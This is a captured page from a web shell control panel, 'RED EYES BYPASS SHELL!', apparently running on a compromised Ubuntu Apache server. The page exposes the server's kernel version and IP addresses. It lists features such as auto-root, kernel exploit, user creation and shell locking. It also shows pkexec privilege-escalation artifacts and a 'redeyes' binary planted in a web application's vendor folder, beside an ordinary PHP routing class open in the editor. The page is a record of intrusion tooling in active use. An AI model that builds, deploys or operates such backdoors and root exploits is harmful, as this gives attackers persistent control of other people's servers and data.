Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
Application.class.php
2.68
KB
-rwxr-xr-x
Controller.class.php
1.44
KB
-rwxr-xr-x
Model.class.php
627
B
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Application.class.php
<?php /* * @link http://kodcloud.com/ * @author warlee | e-mail:kodcloud@qq.com * @copyright warlee 2014.(Shanghai)Co.,Ltd * @license http://kodcloud.com/tools/license/license.txt */ /** * 程序路由处理类 * 这里类判断外界参数调用内部方法 */ class Application { private $defaultController = null; //默认的类名 private $defaultAction = null; //默认的方法名 public $subDir =''; //控制器子目录 public $model = ''; //控制器对应模型 对象。 /** * 设置默认的类名 * @param string $defaultController */ public function setDefaultController($defaultController){ $this -> defaultController = $defaultController; } /** * 设置默认的方法名 * @param string $defaultAction */ public function setDefaultAction($defaultAction){ $this -> defaultAction = $defaultAction; } /** * 设置控制器子目录 * @param string $dir */ public function setSubDir($dir){ $this -> subDir = $dir; } /** * 运行controller 的方法 * @param $class , controller类名。 * @param $function , 方法名 */ public function appRun($className,$function){ $subDir = $this -> subDir ? $this -> subDir . '/' : ''; $classFile = CONTROLLER_DIR . $subDir.$className.'.class.php'; Hook::filter('Application.appRun',$classFile); if (!file_exists_case($classFile)) { show_tips($className.' controller '.LNG("not_exists"),APP_HOST,5); } include_once($classFile); if (!class_exists($className)) { show_tips($className.' class '.LNG("not_exists"),APP_HOST,5); } $instance = new $className(); if (!method_exists($instance, $function)) { show_tips($function.' method '.LNG("not_exists"),APP_HOST,5); } return $instance -> $function(); } /** * 运行自动加载的控制器 */ private function autorun(){ global $config; if (count($config['autorun']) > 0) { foreach ($config['autorun'] as $key => $var) { $this->appRun($var['controller'],$var['function']); } } } /** * 调用实际类和方式 */ public function run(){ $URI = $GLOBALS['in']['URLremote']; if (!isset($URI[0]) || $URI[0] == '') $URI[0] = $this->defaultController; if (!isset($URI[1]) || $URI[1] == '') $URI[1] = $this->defaultAction; //需要校验权限的方法,统一大小写敏感;处理需要权限的方法 $roleSetting = $GLOBALS['config']['roleSetting']; $st = $URI[0]; $act = $URI[1]; if (array_key_exists($st,$roleSetting) ){ if( !in_array($act,$roleSetting[$st]) && in_array_not_case($act,$roleSetting[$st]) ){ show_tips($act.' action not exists!'); } } define('ST',$st); define('ACT',$act); //自动加载运行类。 $this->autorun(); $this->appRun(ST,ACT); } }
Close